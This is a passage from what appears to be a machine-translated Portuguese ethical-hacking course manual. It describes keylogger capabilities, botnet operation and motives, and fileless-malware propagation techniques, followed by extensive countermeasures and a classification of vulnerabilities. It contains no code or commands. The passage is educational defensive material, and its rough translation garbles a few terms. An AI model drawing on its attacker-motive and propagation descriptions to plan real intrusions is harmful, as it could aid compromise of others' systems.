ÿ Capture capturas de tela em intervalos regulares, mostrando a atividade do usuário, como caracteres digitados ou
botões do mouse clicados
ÿ Rastreie as atividades dos usuários registrando títulos de janela, nomes de aplicativos iniciados,
e outras informações
ÿ Monitorar a atividade online dos usuários registrando os endereços dos sites visitados e
com palavras-chave inseridas
ÿ Registre todos os nomes de login, números bancários e de cartão de crédito e senhas, incluindo senhas ocultas ou
dados exibidos em asteriscos ou espaços em branco
ÿ Grave conversas de bate-papo online
ÿ Faça cópias não autorizadas de mensagens de e-mail enviadas e recebidas

botnets
ÿ Um Botnet é uma coleção de computadores comprometidos conectados à Internet para executar uma tarefa distribuída
ÿ Os invasores distribuem software malicioso que transforma o computador do usuário em um bot
ÿ Bot refere-se a um programa ou sistema infectado que executa trabalho repetitivo ou atua como agente ou usuário
interface para controlar outros programas
Os bots se conectam ao
manipulador C&C e aguardam as instruções

ataque de robôs
um servidor de destino
Atacante envia comandos para os bots por meio
de C&C
Comando Bot e
servidor de destino
Centro de Controle
zumbis
Define um bot
manipulador de C&C
Bot procura outros sistemas vulneráveis e
os infecta para
criar botnet
Atacante infecta uma
máquina
Atacante Vítima (Bot)
botnets
Uma botnet é uma coleção de computadores comprometidos conectados à Internet para executar uma tarefa
distribuída. Os invasores distribuem software malicioso que transforma o computador do usuário em um bot, que
se refere a um programa ou sistema infectado que realiza trabalho repetitivo ou age como um agente ou como
uma interface de usuário para controlar outros programas. O computador infectado executa tarefas automatizadas
sem a permissão do usuário. Os invasores usam bots para infectar um grande número de computadores. Os
cibercriminosos que controlam bots são chamados de botmasters. Os bots se espalham pela Internet e procuram
por sistemas vulneráveis e desprotegidos. Quando encontra um sistema exposto, ele infecta rapidamente o sistema
e reporta ao botmaster.
Os invasores usam botnets para distribuir e-mails de spam e realizar ataques de negação de serviço e roubos de
identidade automatizados. O desempenho de um computador que faz parte de uma botnet pode ser afetado.
Botmasters usam computadores infectados para executar várias tarefas automatizadas. Eles podem instruir os
sistemas infectados a transmitir vírus, worms, spam e spyware. Os botmasters também roubam informações
pessoais e privadas dos usuários-alvo, como números de cartão de crédito, dados bancários, nomes de usuário e
senhas. Botmasters lançam ataques DoS em usuários-alvo específicos e extorquem dinheiro para restaurar o
controle dos usuários sobre os recursos comprometidos. Os botmasters também podem usar bots para aumentar
as cobranças de anúncios na web clicando automaticamente nos anúncios da Internet.
Os bots entram em um sistema de destino usando uma carga útil em um cavalo de Tróia ou malware semelhante.
Eles infectam o sistema de destino por meio de downloads drive-by ou enviando e-mails de spam incorporados
com conteúdo malicioso.
A figura ilustra como um invasor inicia um ataque DoS baseado em botnet em um servidor de destino.
O invasor configura um centro C&C de bot, após o qual infecta uma máquina (bot) e a compromete. Mais tarde,
eles usam esse bot para infectar e comprometer outros sistemas vulneráveis

disponíveis na rede, resultando em uma botnet. Os bots (também conhecidos como zumbis) se conectam
ao centro C&C e aguardam instruções. Posteriormente, o invasor envia comandos maliciosos aos bots
por meio do centro de C&C. Por fim, de acordo com as instruções do invasor, os bots lançam um ataque
DoS em um servidor de destino, tornando seus serviços indisponíveis para usuários legítimos na rede.
Figura 3.12: Ataque DDoS baseado em botnet

Por que os invasores usam botnets?
1 2 3
Executar DDoS Use o sniffer para roubar Realize keylogging para
ataques, que informações de um coletar informações de login
consumir o botnet e usá-lo da conta para
largura de banda dos contra outro botnet Serviços
computadores da vítima
4 5 6
Use para espalhar Perpetrar uma “fraude Realizar roubo de
novos bots de cliques” automatizando identidade em massa

cliques
Por que os invasores usam botnets?
Os invasores podem usar botnets para realizar o seguinte:
ÿ Ataques DDoS: Botnets podem gerar ataques DDoS, que consomem a largura de banda dos computadores da
vítima. Botnets também podem sobrecarregar um sistema, desperdiçando recursos valiosos do sistema host e
destruindo a conectividade de rede.
ÿ Spamming: Os invasores usam um proxy SOCKS para spam. Eles coletam endereços de e-mail
de páginas da web ou outras fontes.
ÿ Tráfego farejador: Um farejador de pacotes observa o tráfego de dados entrando em uma máquina comprometida.
Ele permite que um invasor colete informações confidenciais, como números de cartão de crédito e senhas. O
sniffer também permite que um invasor roube informações de uma botnet e as use contra outra botnet. Em
outras palavras, botnets podem roubar uns aos outros.
ÿ Keylogging: Keylogging é um método de gravação das teclas digitadas em um teclado e fornece informações
confidenciais, como senhas do sistema. Os invasores usam keylogging para coletar informações de login de
contas para serviços como o PayPal.
ÿ Espalhando novo malware: Botnets podem ser usados para espalhar novos bots.
ÿ Instalação de add-ons de propaganda: Botnets podem ser usados para perpetrar uma “fraude de clique” por
cliques automatizados.
ÿ Abuso do Google AdSense: algumas empresas permitem a exibição de anúncios do Google AdSense em seus
sites para obter benefícios econômicos. Botnets permitem que um intruso automatize cliques em um anúncio,
produzindo um aumento percentual na fila de cliques.

ÿ Ataques em redes de bate-papo IRC: Também chamados de ataques de clone, esses ataques são
semelhantes a um ataque DDoS. Um agente mestre instrui cada bot a se conectar a milhares de clones
dentro de uma rede IRC, o que pode inundar a rede.
ÿ Manipulação de enquetes e jogos online: Cada botnet tem um endereço único, permitindo
manipular enquetes e jogos online.
ÿ Roubo de identidade em massa: Botnets podem enviar um grande número de e-mails enquanto se
fazem passar por uma organização respeitável, como o eBay. Essa técnica permite que invasores
roubem informações para roubo de identidade.

Malware sem arquivo
O malware sem arquivo, também conhecido como

não-malware, infecta software, aplicativos e outros
protocolos legítimos existentes no sistema para executar
várias atividades maliciosas
Aproveita quaisquer vulnerabilidades existentes para infectar o sistema
Reside na RAM do sistema
Injeta código malicioso nos processos em execução,

como Microsoft Word, Flash, Adobe PDF Reader,
Javascript e PowerShell
Malware sem arquivo
O malware sem arquivo, também chamado de não-malware, infecta software, aplicativos e outros
protocolos legítimos existentes no sistema para executar várias atividades maliciosas. Esse tipo de
malware aproveita as vulnerabilidades existentes para infectar o sistema. Geralmente reside na RAM do sistema.
Ele injeta código malicioso em processos em execução, como Microsoft Word, Flash, Adobe PDF
Reader, Javascript, PowerShell, .NET, macros maliciosas e Windows Management Instrumentation
(WMI).
O malware sem arquivo não depende de arquivos e não deixa rastros, dificultando sua detecção e
remoção usando soluções antimalware tradicionais. Portanto, esse malware é altamente resistente a
técnicas forenses de computador. Ele reside principalmente em locais de memória voláteis, como
processos em execução, registro do sistema e áreas de serviço. Depois que o malware sem arquivo
obtém acesso ao sistema de destino, ele pode explorar ferramentas e processos de administração do
sistema para manter a persistência, escalar privilégios e mover-se lateralmente pela rede de destino. Os
invasores usam esse malware para roubar dados críticos do sistema, instalar outros tipos de malware
ou injetar scripts maliciosos que são executados automaticamente a cada reinicialização do sistema para continuar o ataq

Razões para usar malware sem arquivo em

Ataques cibernéticos
Furtivo por Viver da

natureza terra Fidedigno
Explora ferramentas Explora as ferramentas Utiliza ferramentas que
legítimas do sistema padrão do sistema são frequentemente

usados e confiáveis
Razões para usar malware sem arquivo em ataques cibernéticos
As várias razões para usar malware sem arquivo em ataques cibernéticos são as seguintes:
ÿ Stealth: malware sem arquivo explora ferramentas legítimas do sistema; portanto, é extremamente difícil detectar,
bloquear ou impedir ataques sem arquivo.
ÿ LOL (Living-off-the-land): As ferramentas do sistema exploradas por malware sem arquivo já estão instaladas no
sistema por padrão. Um invasor não precisa criar e instalar ferramentas personalizadas no sistema de destino.
ÿ Confiável: As ferramentas do sistema usadas pelo malware sem arquivo são as ferramentas mais usadas e
confiáveis; portanto, as ferramentas de segurança assumem incorretamente que tais ferramentas estão sendo
executadas para uma finalidade legítima.

e-mails de phishing Infecção pela lateral Manipulação do registro

movimento
sem arquivo
Propagação
Aplicações legítimas
Técnicas Injeção de código de memória
Aplicativos nativos Websites maliciosos Injeção baseada em script

Técnicas de propagação sem arquivo
ÿ E-mails de phishing: os invasores usam e-mails de phishing incorporados com links ou downloads
maliciosos que, quando clicados, injetam e executam códigos maliciosos na memória da vítima.
ÿ Aplicativos legítimos: os invasores exploram pacotes de sistema legítimos instalados no sistema,

como Word e JavaScript, para executar o malware.
ÿ Aplicativos nativos: sistemas operacionais como o Windows incluem ferramentas pré-instaladas,

como PowerShell, Windows Management Instrumentation (WMI). Os invasores exploram essas
ferramentas para instalar e executar códigos maliciosos.
ÿ Infecção por movimento lateral: Uma vez que o malware sem arquivo infecta o sistema de destino,
os invasores usam esse sistema para se mover lateralmente na rede e infectar outros sistemas
conectados à rede.
ÿ Sites maliciosos: os invasores criam sites fraudulentos que parecem legítimos. Quando uma vítima
visita esse site, ela verifica automaticamente o sistema da vítima para detectar vulnerabilidades
em plug-ins que podem ser explorados pelos invasores para executar códigos maliciosos na
memória do navegador.
ÿ Manipulação do registro: os invasores usam essa técnica para injetar e executar código mal-
intencionado diretamente do registro do Windows por meio de um processo de sistema legítimo.
Isso ajuda os invasores a ignorar o UAC, a lista de permissões de aplicativos etc.
processos.
ÿ Injeção de código de memória: Os invasores usam essa técnica para injetar código malicioso e
manter a persistência na memória do processo em execução com o objetivo de propagá-lo e
reinjetá-lo em outros processos legítimos do sistema que são críticos

para a operação normal do sistema. Isso ajuda a contornar os controles de segurança regulares. As várias
técnicas de injeção de código usadas pelos invasores incluem injeção de shellcode local, injeção de thread
remota, santificação de processo, etc.
ÿ Injeção baseada em script: Os invasores geralmente usam scripts nos quais os binários ou shellcode são
ofuscados e codificados. Esses ataques baseados em script podem não ser completamente sem arquivo.
Os scripts geralmente são incorporados em documentos como anexos de e-mail.

troiano
Contramedidas
Evite abrir anexos de e-mail recebidos de
remetentes desconhecidos
Bloqueie todas as portas desnecessárias no host

e no firewall
Evite aceitar programas transferidos por

mensagens instantâneas
Fortalecer configurações fracas e

padrão
Desative a funcionalidade não utilizada,

incluindo protocolos e serviços
Contramedidas de malware
O malware é comumente usado por invasores para comprometer os sistemas de destino. Impedir que o malware entre em
um sistema é muito mais fácil do que tentar eliminá-lo de um sistema infectado.
Esta seção apresenta várias contramedidas que impedem a entrada de malware em um sistema e minimizam o risco causado
por ele em sua entrada.
Contramedidas de Trojan Algumas
contramedidas contra Trojans são as seguintes:
ÿ Evite abrir anexos de e-mail recebidos de remetentes desconhecidos
ÿ Bloqueie todas as portas desnecessárias no host e use um firewall
ÿ Evite aceitar programas transferidos por mensagens instantâneas
ÿ Fortalecer definições de configuração padrão fracas e desabilitar funcionalidades não utilizadas, incluindo
protocolos e serviços
ÿ Monitore o tráfego de rede interna em busca de portas estranhas ou tráfego criptografado
ÿ Evite baixar e executar aplicativos de fontes não confiáveis
ÿ Instalar patches e atualizações de segurança para o sistema operacional e aplicativos
ÿ Escaneie drives USB externos e DVDs com software antivírus antes de usá-los
ÿ Restrinja as permissões no ambiente de área de trabalho para impedir a instalação de aplicativos maliciosos
formulários
ÿ Evite digitar comandos às cegas e implementar programas ou scripts pré-fabricados
ÿ Gerencie a integridade do arquivo da estação de trabalho local por meio de somas de verificação, auditoria e varredura de portas
ÿ Executar antivírus baseado em host, firewall e software de detecção de intrusão

Vírus e Vermes
Contramedidas
Instale um software antivírus e atualize-o
01 regularmente
Agende verificações regulares para todas as

02 unidades após a instalação do software antivírus
Preste atenção às instruções ao baixar

03 arquivos da Internet
Evite abrir anexos recebidos de remetente desconhecido

04
05 Mantenha backup de dados regularmente
Contramedidas de Vírus e Worms
Algumas contramedidas contra vírus e worms são as seguintes:
ÿ Instale um software antivírus que detecte e remova infecções à medida que aparecem
ÿ Preste atenção às instruções ao baixar arquivos ou programas da Internet
ÿ Atualize regularmente o software antivírus
ÿ Evite abrir anexos recebidos de remetentes desconhecidos, pois os vírus se espalham por meio de anexos de e-
mail
ÿ Como as infecções por vírus podem corromper os dados, certifique-se de fazer backups regulares dos dados
ÿ Agende varreduras regulares para todas as unidades após a instalação do software antivírus
ÿ Não aceite discos ou programas sem primeiro verificá-los usando uma versão atual do
um programa antivírus
ÿ Não inicialize a máquina com um disco de sistema inicializável infectado
ÿ Mantenha-se informado sobre as últimas ameaças de vírus
ÿ Verifique os DVDs quanto à infecção por vírus
ÿ Certifique-se de que os bloqueadores de pop-up estejam ativados e use um firewall de Internet
ÿ Execute a limpeza do disco e execute um scanner de registro uma vez por semana
ÿ Executar anti-spyware ou anti-adware uma vez por semana
ÿ Não abra arquivos com mais de uma extensão de tipo de arquivo
ÿ Seja cauteloso com arquivos enviados por meio de aplicativos de mensagens instantâneas

Contramedidas de rootkit
Reinstale o sistema operacional/aplicativos de

uma fonte confiável após fazer backup dos dados críticos
Manter procedimentos de instalação automatizados

bem documentados
Proteger a estação de trabalho ou servidor

contra o ataque
Instalar firewalls baseados em rede e host
Evite fazer login em uma conta com privilégios administrativos
Contramedidas de rootkit
Algumas técnicas adotadas para se defender contra rootkits são as seguintes:
ÿ Reinstale o sistema operacional/aplicativos de uma fonte confiável após fazer backup de dados críticos
ÿ Manter procedimentos de instalação automatizada bem documentados
ÿ Realizar análise de despejo de memória do kernel para determinar a presença de rootkits
ÿ Proteja a estação de trabalho ou servidor contra o ataque
ÿ Não baixe nenhum arquivo/programa de fontes não confiáveis
ÿ Instale firewalls baseados em rede e host e verifique frequentemente se há atualizações
ÿ Garantir a disponibilidade de mídia de restauração confiável
ÿ Atualizar e corrigir sistemas operacionais, aplicativos e firmware
ÿ Verifique regularmente a integridade dos arquivos do sistema usando tecnologias de impressão digital
criptograficamente fortes
ÿ Atualize regularmente o software antivírus e anti-spyware
ÿ Mantenha as assinaturas anti-malware atualizadas
ÿ Evite fazer login em uma conta com privilégios administrativos
ÿ Aderir ao princípio do menor privilégio
ÿ Certifique-se de que o software antivírus escolhido possui proteção contra rootkit
ÿ Não instale aplicativos desnecessários e desative os recursos e serviços que não estão em uso

ÿ Abster-se de se envolver em atividades perigosas na Internet
ÿ Feche todas as portas não utilizadas
ÿ Verificar periodicamente o sistema local usando verificadores de segurança baseados em host
ÿ Aumente a segurança do sistema usando autenticação em duas ou várias etapas, para que
um invasor não obterá acesso root ao sistema para instalar rootkits
ÿ Nunca leia e-mails, navegue em sites ou abra documentos enquanto manuseia um ativo
sessão com um servidor remoto

Contramedidas de Spyware
Tente evitar o uso de qualquer sistema de computador que não

1 esteja totalmente sob seu controle
Ajuste as configurações de segurança do navegador

2 para médio ou superior para a zona da Internet
3 Tenha cuidado com e- mails e sites suspeitos
Verifique regularmente o relatório do gerenciador de tarefas e

4 Relatório do gerenciador de configuração do MS
5 Instalar e usar software anti-spyware
Contramedidas de Spyware
Diferentes maneiras de se defender contra spyware são as seguintes:
ÿ Tente evitar o uso de qualquer sistema de computador sobre o qual você não tenha controle total.
ÿ Nunca ajuste o nível de configuração de segurança da Internet muito baixo, pois isso oferece muitas chances de
spyware ser instalado em seu computador. Portanto, sempre defina as configurações de segurança do navegador
da Internet como alta ou média para proteger seu computador contra spyware.
ÿ Não abra e-mails suspeitos e anexos de arquivos recebidos de remetentes desconhecidos.

Há uma grande probabilidade de permitir a entrada de vírus, freeware ou spyware no computador. Não abra sites
desconhecidos com links em mensagens de spam, recuperados por mecanismos de pesquisa ou exibidos em
janelas pop-up, pois eles podem induzi-lo a baixar spyware.
ÿ Habilite um firewall para aumentar o nível de segurança do seu computador.
ÿ Atualize regularmente o software e use um firewall com proteção de saída.
ÿ Verifique regularmente os relatórios do Gerenciador de Tarefas e do Gerenciador de Configuração do MS.
ÿ Atualize regularmente os arquivos de definição de vírus e verifique se há spyware no sistema.
ÿ Instale o software anti-spyware. Anti-spyware é a primeira linha de defesa contra spyware.

Este software impede a instalação de spyware em seu sistema. Ele verifica periodicamente e protege seu sistema
contra spyware.

ÿ Mantenha seu sistema operacional atualizado.
o Os usuários do Windows devem executar periodicamente uma atualização do Windows ou da Microsoft.
o Para usuários de outros sistemas operacionais ou produtos de software, consulte as informações fornecidas pelos fornecedores
de sistemas operacionais e tome as medidas essenciais contra qualquer vulnerabilidade identificada.
ÿ Navegue na web com segurança e faça downloads com cuidado.
o Antes de baixar qualquer software, verifique se ele é de um site confiável. Leia o contrato de licença, o aviso de
segurança e as declarações de privacidade associadas ao software completamente para obter uma compreensão
clara antes de baixá-lo.
o Antes de baixar freeware ou shareware de um site, verifique se o site é seguro. Da mesma forma, tenha cuidado
com programas de software obtidos por meio de software de troca de arquivos P2P. Antes de instalar esses
programas, execute uma varredura usando um software anti-spyware.
ÿ Não use o modo administrativo a menos que seja necessário, pois pode executar programas maliciosos como spyware
no modo administrador. Consequentemente, os invasores podem assumir o controle total do seu sistema.
ÿ Não baixe arquivos de música gratuitos, protetores de tela ou emoticons da Internet porque, ao fazer isso, existe a
possibilidade de estar baixando spyware junto com eles.
ÿ Cuidado com janelas pop-up ou páginas da web. Nunca clique em qualquer lugar nas janelas que exibem mensagens
como “seu computador pode estar infectado” ou afirmam que elas podem ajudar seu computador a funcionar mais
rápido. Se você clicar nessas janelas, seu sistema pode ser infectado por spyware.
ÿ Leia atentamente todas as divulgações, incluindo o contrato de licença e a declaração de privacidade,

antes de instalar qualquer aplicativo.
ÿ Não armazene informações pessoais ou financeiras em qualquer sistema de computador que não seja
totalmente sob seu controle, como em um cibercafé.

PUAs/Adware
Contramedidas
Sempre use sites da lista de permissões,
OPÇÃO 01
1 confiáveis e autorizados para baixar software
Leia o EULA (contrato de licença do usuário final)

OPÇÃO 01
2 antes de instalar qualquer programa
Evite instalar programas através do “método expresso” ou “método

OPÇÃO 01
3 recomendado”
OPÇÃO 01
4 Instale software antivírus, antiadware ou bloqueador de anúncios confiável
OPÇÃO 01
5 Esteja atento a técnicas de engenharia social e ataques de phishing
PUAs/contramedidas de adware
Algumas contramedidas comuns contra PUAs/adware são as seguintes.
ÿ Sempre use fornecedores de software e sites na lista de permissões, confiáveis e autorizados para
baixar software.
ÿ Sempre leia o contrato de licença do usuário final (EULA) e quaisquer outros termos e condições
antes de instalar qualquer programa.
ÿ Sempre ative a opção de detectar PUAs no sistema operacional ou no software antivírus.
ÿ Atualize regularmente o sistema operacional e o software antivírus para detectar e corrigir os PUAs mais recentes.
ÿ Desmarque as opções desnecessárias ao executar a configuração do software para evitar

instalação automática de PUAs.
ÿ Evite instalar programas através do “método expresso” ou “método recomendado” e, em vez disso, escolha a
instalação personalizada.
ÿ Esteja atento às técnicas de engenharia social e ataques de phishing para evitar o download de PUAs.
ÿ Instale software antivírus, anti-adware ou bloqueador de anúncios confiável para detectar e bloquear adware
e outros programas maliciosos.
ÿ Use versões de software pagas e evite baixar freeware e outros programas shareware fornecidos por terceiros.
ÿ Empregar um firewall para filtrar a transmissão de dados e enviar apenas autorizados e confiáveis
contente.
ÿ Examine cuidadosamente URLs e endereços de e-mail e evite clicar em links suspeitos.

ÿ Reserve um tempo para pesquisar e ler comentários online antes de baixar qualquer software ou
plugar.
ÿ Tente pesquisar o software em um mecanismo de pesquisa, em vez de clicar em anúncios

redirecionando para o download do software.

Contramedidas do Keylogger
ÿ Use bloqueadores de pop-up e evite abrir e- mails indesejados
ÿ Instale programas anti-spyware/antivírus e mantenha

as assinaturas em dia
ÿ Instale software de firewall profissional e software anti-

keylogging
ÿ Use software de interferência de pressionamento de tecla, que

insere caracteres aleatórios em cada pressionamento de tecla
ÿ Use o utilitário de acessibilidade do teclado na tela do Windows

para inserir uma senha
Contramedidas do Keylogger
Diferentes contramedidas para se defender contra keyloggers são listadas a seguir:
ÿ Use bloqueadores de pop-up e evite abrir e-mails indesejados.
ÿ Instale programas anti-spyware/antivírus e mantenha as assinaturas atualizadas.
ÿ Instale software de firewall profissional e software anti-keylogging.
ÿ Reconhecer e-mails de phishing e excluí-los.
ÿ Atualize regularmente e corrija o software do sistema.
ÿ Não clique em links de e-mails não solicitados ou duvidosos que possam direcioná-lo para
sites.
ÿ Use software de interferência de pressionamento de tecla que insere caracteres aleatórios em cada
pressionamento de tecla.
ÿ O software antivírus e anti-spyware pode detectar qualquer software instalado, mas é melhor detectar
esses programas antes da instalação. Examine os arquivos cuidadosamente antes de instalá-los no
computador e use um editor de registro ou explorador de processos para verificar se há registradores
de pressionamento de tecla.
ÿ Use o utilitário de acessibilidade do teclado na tela do Windows para inserir uma senha ou qualquer outra
informação confidencial. Use o mouse para inserir qualquer informação, como senhas e números de
cartão de crédito, nos campos, usando o mouse em vez de digitar as senhas com o teclado. Isso
garantirá que suas informações sejam confidenciais.

ÿ Use um gerenciador de senhas de preenchimento automático ou um teclado virtual para inserir nomes de usuários e
senhas, pois isso evitará a exposição por meio de keyloggers. Este gerenciador de senhas de preenchimento
automático de formulários eliminará a necessidade de digitar seus dados pessoais, financeiros ou confidenciais,
como números de cartão de crédito e senhas, por meio do teclado.
ÿ Mantenha seus sistemas de hardware seguros em um ambiente bloqueado e verifique frequentemente os cabos do
teclado quanto a conectores conectados, porta USB e jogos de computador, como o PS2, que podem ter sido
usados para instalar o software keylogger.
ÿ Use um software que escaneie e monitore com frequência as alterações em seu sistema ou rede.
ÿ Instale um IDS baseado em host, que pode monitorar seu sistema e desabilitar a instalação de
keyloggers.
ÿ Use senha de uso único (OTP) ou outros mecanismos de autenticação, como em duas etapas ou
verificação em várias etapas para autenticar usuários.
ÿ Habilite a lista branca de aplicativos para bloquear o download ou a instalação de software indesejado, como keyloggers.
ÿ Use VPN para habilitar uma camada adicional de proteção por meio de criptografia.
ÿ Use ferramentas de monitoramento de processos para detectar processos suspeitos e atividades do sistema.
ÿ Regularmente corrija e atualize o software e o sistema operacional.

Contramedidas de malware sem arquivo
Remova todas as ferramentas administrativas e
restrinja o acesso por meio da Política de Grupo do Windows 1 2

Desative o PowerShell e o WMI quando não
estiver em uso
ou do Windows AppLocker
Desativar leitores de PDF

3 para executar JavaScript automaticamente
Desative o Flash nas configurações
do navegador
5
Execute varreduras AV periódicas para detectar

4 infecções e manter o AV atualizado
Contramedidas de malware sem arquivo
Algumas contramedidas contra ataques de malware sem arquivo são as seguintes:
ÿ Remova todas as ferramentas administrativas e restrinja o acesso por meio da Política de Grupo do Windows
ou Windows AppLocker
ÿ Desativar PowerShell e WMI quando não estiver em uso
ÿ Desativar macros e usar apenas macros confiáveis assinadas digitalmente
ÿ Instale soluções de lista branca, como o McAfee Application Control, para bloquear
aplicativos e códigos em execução em seus sistemas
ÿ Nunca habilite macros em documentos do MS Office
ÿ Desative os leitores de PDF para executar o JavaScript automaticamente
ÿ Desative o Flash nas configurações do navegador
ÿ Implementar autenticação de dois fatores para acessar sistemas críticos ou recursos conectados
para a rede
ÿ Implementar segurança multicamada para detectar e defender contra malware residente na memória
ÿ Use as soluções User Behavior Analytics (UBA) para detectar ameaças ocultas em seus dados
ÿ Garanta a capacidade de detectar ferramentas do sistema, como PowerShell e WMIC, e scripts de aplicativos na lista de
permissões contra ataques maliciosos
ÿ Execute verificações antivírus periódicas para detectar infecções e manter o programa antivírus
Atualizada
ÿ Instale ferramentas de proteção do navegador e desabilite downloads automáticos de plugins

ÿ Agendar verificações regulares de segurança para aplicativos e corrigir regularmente os aplicativos
ÿ Atualize regularmente o sistema operacional com os patches de segurança mais recentes
ÿ Examine todos os programas em execução em busca de assinaturas e heurísticas novas ou maliciosas
ÿ Habilite a segurança do endpoint com monitoramento ativo para proteger as redes quando acessadas
remotamente
ÿ Analisar os indicadores de comprometimento do sistema e da rede
ÿ Verifique regularmente os logs de segurança, especialmente quando quantidades excessivas de dados saem do
rede
ÿ Restrinja os direitos de administrador e forneça o mínimo de privilégios ao nível do usuário para evitar ataques de
escalonamento de privilégios
ÿ Use o controle de aplicativos para impedir que os navegadores da Internet gerem interpretadores de script
como PowerShell e WMIC.
ÿ Examine cuidadosamente as mudanças nos padrões de comportamento usuais do sistema em comparação com
as linhas de base
ÿ Use software antivírus de próxima geração (NGAV) que emprega tecnologia avançada, como ML (aprendizado de
máquina) e IA (inteligência artificial) para evitar novos malwares polimórficos
ÿ Use a linha de base e procure táticas, técnicas e procedimentos conhecidos (TTPs) usados por muitos grupos adversários
ÿ Certifique-se de usar os serviços de detecção e resposta gerenciada (MDR) que podem executar
caça ameaça
ÿ Certifique-se de usar ferramentas como Blackberry Cylance e Microsoft Enhanced Mitigation

Experimente o Toolkit para combater ataques sem arquivo
ÿ Desative aplicativos e recursos de serviço não utilizados ou desnecessários
ÿ Desinstale aplicativos que não são importantes
ÿ Bloquear todo o tráfego de rede de entrada ou arquivos com o formato .exe

Fluxo do módulo
1 2
3 4
Definir vulnerabilidades
Em uma rede, geralmente há duas causas principais para a vulnerabilidade dos sistemas: (1)
configuração incorreta de software ou hardware e (2) práticas de programação inadequadas. Os
invasores exploram essas vulnerabilidades para realizar vários tipos de ataques aos recursos
organizacionais. Esta seção descreve vulnerabilidades, classificação de vulnerabilidades e o impacto
causado por essas vulnerabilidades.

O que é Vulnerabilidade?
ÿ Refere-se à existência de fraqueza em um
ativo que pode ser explorado por agentes de ameaças
Razões comuns por trás do

Existência de Vulnerabilidade
1 Configuração incorreta de hardware ou software
Design inseguro ou ruim da rede e do aplicativo

2
3 Fraquezas tecnológicas inerentes
4 Abordagem descuidada dos usuários finais
O que é Vulnerabilidade?
Uma vulnerabilidade refere-se a uma fraqueza no projeto ou implementação de um sistema que pode ser explorada
para comprometer a segurança do sistema. Freqüentemente, é uma brecha de segurança que permite que um
invasor entre no sistema ignorando a autenticação do usuário.
Razões Comuns para a Existência de Vulnerabilidades
ÿ Configuração incorreta de hardware ou software
A configuração insegura do hardware ou software em uma rede pode levar a brechas de segurança. Por
exemplo, uma configuração incorreta ou o uso de um protocolo não criptografado pode levar a invasões de
rede, resultando no vazamento de informações confidenciais. Enquanto uma configuração incorreta de
hardware pode permitir que invasores obtenham acesso à rede ou sistema, uma configuração incorreta de
software pode permitir que invasores obtenham acesso a aplicativos e dados.
ÿ Design inseguro ou pobre de rede e aplicação
Um design impróprio e inseguro de uma rede pode torná-la suscetível a várias ameaças e possível perda de
dados. Por exemplo, se as tecnologias de firewall, IDS e rede virtual privada (VPN) não forem implementadas
com segurança, elas poderão expor a rede a várias ameaças.
ÿ Fraquezas tecnológicas inerentes
Se o hardware ou software não for capaz de defender a rede contra certos tipos de ataques, a rede ficará
vulnerável a esses ataques. Certos hardwares, aplicativos ou navegadores da Web tendem a ser propensos
a ataques como DoS ou ataques man-in-the-middle. Por exemplo, sistemas que executam versões antigas
de navegadores da Web são propensos a

ataques distribuídos. Se os sistemas não forem atualizados, um pequeno ataque de Trojan pode forçar o
usuário a verificar e limpar todo o armazenamento da máquina, o que geralmente leva à perda de dados.
ÿ Descuido do usuário final
O descuido do usuário final afeta consideravelmente a segurança da rede. O comportamento humano é

bastante suscetível a vários tipos de ataques e pode ser explorado para gerar resultados graves, incluindo
perda de dados e vazamento de informações. Intrusos podem obter informações confidenciais por meio de
várias técnicas de engenharia social. O compartilhamento de informações de conta ou credenciais de login
por usuários com entidades potencialmente maliciosas pode levar à perda de dados ou à exploração das
informações. Conectar sistemas a uma rede insegura também pode levar a ataques de terceiros.
ÿ Atos intencionais do usuário final
Ex-funcionários que continuam a ter acesso a drives compartilhados podem usá-los indevidamente, revelando
informações confidenciais da empresa. Tal ato é chamado de ato intencional do usuário final e pode levar a
dados pesados e perdas financeiras para a empresa.

1 2 3 4
Configuração incorreta Instalações Padrão estouros de buffer Servidores não corrigidos
5 6
Falhas de projeto
Vulnerabilidade Sistema operacional
Imperfeições
Classificação
7 8 9 10
Dia Zero/Legado
Falhas de aplicativos Serviços abertos Senhas padrão
Vulnerabilidades da plataforma
Classificação de Vulnerabilidade
As vulnerabilidades presentes em um sistema ou rede são classificadas nas seguintes categorias:
ÿ Configuração incorreta
A configuração incorreta é a vulnerabilidade mais comum e é causada principalmente por erro humano, que
permite que invasores obtenham acesso não autorizado ao sistema. Pode acontecer intencionalmente ou não
e afeta servidores web, plataformas de aplicativos, bancos de dados e redes.
A seguir estão alguns exemplos de configuração incorreta:
o Um aplicativo em execução com depuração habilitada
o Portas administrativas desnecessárias abertas para um aplicativo
o Executar software desatualizado no sistema
o Executando serviços desnecessários em uma máquina
o Conexões de saída para vários serviços de Internet
o Usando certificados SSL mal configurados ou certificados padrão
o Sistemas externos autenticados incorretamente
o Permissões de pasta incorretas
o Contas ou senhas padrão
o Configurar ou páginas de configuração habilitadas
o Desativação de configurações e recursos de segurança

Os invasores podem detectar facilmente essas configurações incorretas usando ferramentas de verificação e,
em seguida, explorar os sistemas de back-end. Portanto, os administradores devem alterar a configuração
padrão dos dispositivos e otimizar a segurança dos dispositivos.
ÿ Instalações Padrão
As instalações padrão geralmente são fáceis de usar — especialmente quando o dispositivo está sendo
usado pela primeira vez, quando a principal preocupação é a usabilidade do dispositivo, e não a segurança
do dispositivo. Em alguns casos, os dispositivos infectados podem não conter nenhuma informação valiosa,
mas estão conectados a redes ou sistemas que possuem informações confidenciais que resultariam em uma
violação de dados. Deixar de alterar as configurações padrão durante a implantação do software ou hardware
permite que o invasor adivinhe as configurações para invadir o sistema.
ÿ Estouros de Buffer
Estouros de buffer são vulnerabilidades de software comuns que ocorrem devido a erros de codificação que
permitem que invasores obtenham acesso ao sistema de destino. Em um ataque de estouro de buffer, os
invasores prejudicam o funcionamento dos programas e tentam assumir o controle do sistema gravando
conteúdo além do tamanho alocado do buffer. A verificação insuficiente de limites no programa é a causa
principal. O buffer não é capaz de lidar com dados além de seu limite, causando o fluxo de dados para locais
de memória adjacentes e sobrescrevendo seus valores de dados. Frequentemente, os sistemas falham,
tornam-se instáveis ou apresentam um comportamento errático do programa quando ocorre o estouro do
buffer.
ÿ Servidores sem patch
Os servidores são um componente essencial da infraestrutura de qualquer organização. Existem vários casos
em que as organizações executam servidores sem patches e mal configurados que comprometem a segurança
e a integridade dos dados em seu sistema. Os hackers procuram essas vulnerabilidades nos servidores e as
exploram. Como esses servidores não corrigidos são um hub para os invasores, eles servem como um ponto
de entrada na rede. Isso pode levar à exposição de dados privados, perda financeira e interrupção das
operações. A atualização regular do software e a manutenção adequada dos sistemas, corrigindo e corrigindo
